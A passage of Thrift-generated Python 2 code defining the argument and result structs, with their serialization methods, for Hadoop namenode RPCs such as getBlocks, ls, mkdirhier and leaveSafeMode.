   - err: IOException raised by the server, if any.
  """

  # Field id 0 is the conventional thrift slot for a return value.
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(Block, Block.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          # Decode the list of Block structs element by element.
          self.success = []
          (_etype17, _size14) = iprot.readListBegin()
          for _i18 in xrange(_size14):
            _elem19 = Block()
            _elem19.read(iprot)
            self.success.append(_elem19)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getBlocks_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter20 in self.success:
        iter20.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class getPreferredBlockSize_args(object):
  """
  Thrift argument struct for the getPreferredBlockSize() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10).
   - path: Path to the file.
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None,):
    self.ctx = ctx
    self.path = path

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getPreferredBlockSize_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class getPreferredBlockSize_result(object):
  """
  Thrift result struct for the getPreferredBlockSize() RPC.

  Attributes:
   - success: i64 block size returned by the server (field id 0).
   - err: IOException raised by the server, if any.
  """

  # Field id 0 is the conventional thrift slot for a return value.
  thrift_spec = (
    (0, TType.I64, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.I64:
          self.success = iprot.readI64();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('getPreferredBlockSize_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.I64, 0)
      oprot.writeI64(self.success)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class isInSafeMode_args(object):
  """
  Thrift argument struct for the isInSafeMode() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10); the only field.
  """

  # Tuple index == thrift field id; None entries pad unused ids 0-9.
  thrift_spec = (
    None, # 0
    None, # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None,):
    self.ctx = ctx

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('isInSafeMode_args')
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class isInSafeMode_result(object):
  """
  Thrift result struct for the isInSafeMode() RPC.

  Attributes:
   - success: bool returned by the server (field id 0).
   - err: IOException raised by the server, if any.
  """

  # Field id 0 is the conventional thrift slot for a return value.
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('isInSafeMode_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class leaveSafeMode_args(object):
  """
  Thrift argument struct for the leaveSafeMode() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10); the only field.
  """

  # Tuple index == thrift field id; None entries pad unused ids 0-9.
  thrift_spec = (
    None, # 0
    None, # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None,):
    self.ctx = ctx

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('leaveSafeMode_args')
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class leaveSafeMode_result(object):
  """
  Thrift result struct for the leaveSafeMode() RPC (void return).

  Attributes:
   - err: IOException raised by the server, if any.
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )

  def __init__(self, err=None,):
    self.err = err

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('leaveSafeMode_result')
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class ls_args(object):
  """
  Thrift argument struct for the ls() RPC.

  Attributes:
   - ctx: Request context (thrift field id 10).
   - path: Path to the directory.
  """

  # Tuple index == thrift field id; None entries pad unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )

  def __init__(self, ctx=None, path=None,):
    self.ctx = ctx
    self.path = path

  def read(self, iprot):
    """Deserialize this struct from *iprot*; unknown fields are skipped."""
    # Fast path: C-accelerated binary decoding when available.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()

  def write(self, oprot):
    """Serialize this struct to *oprot*; None-valued fields are omitted."""
    # Fast path: C-accelerated binary encoding when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    oprot.writeStructBegin('ls_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()

  def validate(self):
    # No required fields declared, so nothing to check.
    return

  def __repr__(self):
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))

  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__

  def __ne__(self, other):
    return not (self == other)
class ls_result(object):
  """
  Thrift-generated result struct for the ls RPC: a list of Stat on success,
  or an IOException.

  Attributes:
   - success
   - err
  """
  # Field metadata indexed by Thrift field id (0 is the return value).
  thrift_spec = (
    (0, TType.LIST, 'success', (TType.STRUCT,(Stat, Stat.thrift_spec)), None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.LIST:
          self.success = []
          (_etype24, _size21) = iprot.readListBegin()
          for _i25 in xrange(_size21):
            _elem26 = Stat()
            _elem26.read(iprot)
            self.success.append(_elem26)
          iprot.readListEnd()
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('ls_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.LIST, 0)
      oprot.writeListBegin(TType.STRUCT, len(self.success))
      for iter27 in self.success:
        iter27.write(oprot)
      oprot.writeListEnd()
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class mkdirhier_args(object):
  """
  Thrift-generated argument struct for the mkdirhier RPC.

  Attributes:
   - ctx
   - path: Path to the directory.
   - perms: Access permissions of the directory.
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRING, 'path', None, None, ), # 1
    (2, TType.I16, 'perms', None, None, ), # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )
  def __init__(self, ctx=None, path=None, perms=None,):
    self.ctx = ctx
    self.path = path
    self.perms = perms
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRING:
          self.path = iprot.readString();
        else:
          iprot.skip(ftype)
      elif fid == 2:
        if ftype == TType.I16:
          self.perms = iprot.readI16();
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('mkdirhier_args')
    if self.path is not None:
      oprot.writeFieldBegin('path', TType.STRING, 1)
      oprot.writeString(self.path)
      oprot.writeFieldEnd()
    if self.perms is not None:
      oprot.writeFieldBegin('perms', TType.I16, 2)
      oprot.writeI16(self.perms)
      oprot.writeFieldEnd()
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class mkdirhier_result(object):
  """
  Thrift-generated result struct for the mkdirhier RPC: a bool on success,
  or an IOException.

  Attributes:
   - success
   - err
  """
  # Field metadata indexed by Thrift field id (0 is the return value).
  thrift_spec = (
    (0, TType.BOOL, 'success', None, None, ), # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )
  def __init__(self, success=None, err=None,):
    self.success = success
    self.err = err
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 0:
        if ftype == TType.BOOL:
          self.success = iprot.readBool();
        else:
          iprot.skip(ftype)
      elif fid == 1:
        if ftype == TType.STRUCT:
          self.err = hadoop.api.common.ttypes.IOException()
          self.err.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('mkdirhier_result')
    if self.success is not None:
      oprot.writeFieldBegin('success', TType.BOOL, 0)
      oprot.writeBool(self.success)
      oprot.writeFieldEnd()
    if self.err is not None:
      oprot.writeFieldBegin('err', TType.STRUCT, 1)
      self.err.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class refreshNodes_args(object):
  """
  Thrift-generated argument struct for the refreshNodes RPC.

  Attributes:
   - ctx
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  thrift_spec = (
    None, # 0
    None, # 1
    None, # 2
    None, # 3
    None, # 4
    None, # 5
    None, # 6
    None, # 7
    None, # 8
    None, # 9
    (10, TType.STRUCT, 'ctx', (hadoop.api.common.ttypes.RequestContext, hadoop.api.common.ttypes.RequestContext.thrift_spec), None, ), # 10
  )
  def __init__(self, ctx=None,):
    self.ctx = ctx
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
    if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
      fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
      return
    # Slow path: walk fields one at a time, skipping unknown ids or mismatched types.
    iprot.readStructBegin()
    while True:
      (fname, ftype, fid) = iprot.readFieldBegin()
      if ftype == TType.STOP:
        break
      if fid == 10:
        if ftype == TType.STRUCT:
          self.ctx = hadoop.api.common.ttypes.RequestContext()
          self.ctx.read(iprot)
        else:
          iprot.skip(ftype)
      else:
        iprot.skip(ftype)
      iprot.readFieldEnd()
    iprot.readStructEnd()
  def write(self, oprot):
    # Fast path: C-accelerated encode when available.
    if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
      oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
      return
    # Only non-None fields are serialized.
    oprot.writeStructBegin('refreshNodes_args')
    if self.ctx is not None:
      oprot.writeFieldBegin('ctx', TType.STRUCT, 10)
      self.ctx.write(oprot)
      oprot.writeFieldEnd()
    oprot.writeFieldStop()
    oprot.writeStructEnd()
  def validate(self):
    # No required fields to validate in this generated struct.
    return
  def __repr__(self):
    # NOTE: Python 2 API (dict.iteritems); this generated module targets Python 2.
    L = ['%s=%r' % (key, value)
      for key, value in self.__dict__.iteritems()]
    return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
  def __eq__(self, other):
    return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
  def __ne__(self, other):
    return not (self == other)
class refreshNodes_result(object):
  """
  Thrift-generated result struct for the refreshNodes RPC.

  Attributes:
   - err
  """
  # Field metadata indexed by Thrift field id; None entries are unused ids.
  thrift_spec = (
    None, # 0
    (1, TType.STRUCT, 'err', (hadoop.api.common.ttypes.IOException, hadoop.api.common.ttypes.IOException.thrift_spec), None, ), # 1
  )
  def __init__(self, err=None,):
    self.err = err
  def read(self, iprot):
    # Fast path: C-accelerated decode when the binary protocol/transport support it.
